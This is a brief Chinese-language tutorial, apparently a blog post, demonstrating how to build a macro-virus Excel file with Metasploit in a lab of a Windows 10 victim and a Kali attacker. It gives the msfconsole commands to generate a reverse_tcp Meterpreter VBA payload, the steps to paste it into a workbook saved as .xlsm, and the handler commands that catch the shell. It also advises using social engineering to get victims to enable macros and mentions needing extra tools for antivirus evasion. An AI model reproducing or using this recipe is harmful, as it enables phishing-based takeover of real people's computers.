摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:
受害机:win10(192.168.8.123)
攻击机:kali(192.168.8.131)
攻击演示:
1、生成能反弹会话的宏病毒代码
use windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
generate -t vba
2、将宏病毒植入office文件
将之前生成的宏病毒代码完整复制出来,新建一个excel文件,录制宏
编辑宏
打开左侧栏的"This Workbook",将之前复制的宏病毒代码完整的粘贴进去,保存好
保存过程中如果有如下提示,点击“否”,另存为“.xlsm”格式(启用宏的excel文件格式)
最后生成如下文件
3、设置metasploit监听返回会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
exploit
利用社会工程学,把此文件诱导受害者点击打开,并启用宏
成功返回一个meterpreter会话
4、总结
原始生成的宏病毒代码并不具备免杀性质,需要辅以工具来达到免杀效果;
当受害者关闭带有病毒的文件后,相应的,返回的meterpreter会话也被终止。